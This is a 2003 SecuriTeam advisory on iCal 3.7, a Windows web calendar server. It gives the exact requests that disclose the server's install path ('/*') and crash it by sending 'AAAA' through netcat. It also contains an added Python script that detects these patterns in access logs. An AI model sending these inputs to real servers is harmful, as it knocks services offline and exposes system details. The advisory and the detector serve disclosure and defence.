[NT] iCal Remote DoS and Path Disclosure
From: support@securiteam.com
Date: 01/05/03
From: support@securiteam.com To: list@securiteam.com Date: 5 Jan 2003 12:03:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
iCal Remote DoS and Path Disclosure
------------------------------------------------------------------------
SUMMARY
<http://www.brownbearsw.com> iCal is a web calendar server for
Microsoft Windows. It can be used to show meetings, events, or other
schedules. Calendars can be viewed, edited, and administered entirely
through the web. iCal is built for thin clients, so calendars can be
accessed without any plug-ins or Java interpreters. Two vulnerabilities in
the product allow remote attackers to reveal the true filesystem path used
by the server, and to cause the server to crash.
DETAILS
Vulnerable systems:
* iCal version 3.7
Path disclosure:
Accessing http://target/* returns the following error message:
Unable to write to D:\program files\iCl 3.7 Web Calendar\*.cal
Denial of service:
Connecting using "nc target 80" and then sending:
AAAA
followed by Enter returns the following error message:
Access violation at address 00403d8b in module'ICAL.EXE' Read of address 0161c1af
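Both conditions described above leave a footprint in the web server's access log: the path disclosure shows up as a request for a path containing `*`, and the crash trigger shows up as a request line that is not valid HTTP at all. The following added example (not part of the advisory) scans constructed Common Log Format lines for these two patterns; the log format, sample entries and the method list are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample access log in Common Log Format (not taken from the advisory).
# Line 2 is a wildcard request like the path-disclosure case; line 3 is a bare
# non-HTTP request line like the one that crashes ICAL.EXE.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2003:12:01:00 +0200] "GET /calendar.html HTTP/1.0" 200 2048
10.0.0.9 - - [05/Jan/2003:12:02:10 +0200] "GET /* HTTP/1.0" 500 312
10.0.0.9 - - [05/Jan/2003:12:03:00 +0200] "AAAA" 400 0
10.0.0.7 - - [05/Jan/2003:12:04:30 +0200] "GET /images/logo.gif HTTP/1.1" 200 1400
"""

# Common Log Format: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# A well-formed HTTP/1.x request line: METHOD SP target SP HTTP/x.y (assumed method set)
REQUEST_LINE_RE = re.compile(r"^(GET|HEAD|POST|PUT|DELETE|OPTIONS|TRACE) \S+ HTTP/\d\.\d$")


def classify_request(req: str) -> str:
    """Return 'malformed-request-line', 'wildcard-path' or 'ok' for one request line."""
    if not REQUEST_LINE_RE.match(req):
        # Anything that is not a valid request line (e.g. "AAAA") is suspicious:
        # the advisory's crash is triggered by exactly this kind of input.
        return "malformed-request-line"
    path = req.split(" ")[1].split("?", 1)[0]  # drop any query string
    if "*" in path:
        # Wildcards in the path are what produces the full-path error message.
        return "wildcard-path"
    return "ok"


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse CLF lines and return one finding per request that is not 'ok'."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF
        verdict = classify_request(m.group("req"))
        if verdict != "ok":
            findings.append({"ip": m.group("ip"), "request": m.group("req"), "reason": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}: {f['reason']} -> {f['request']!r}")
```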
ADDITIONAL INFORMATION
The information has been provided by securma massine <mailto:securma@caramail.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.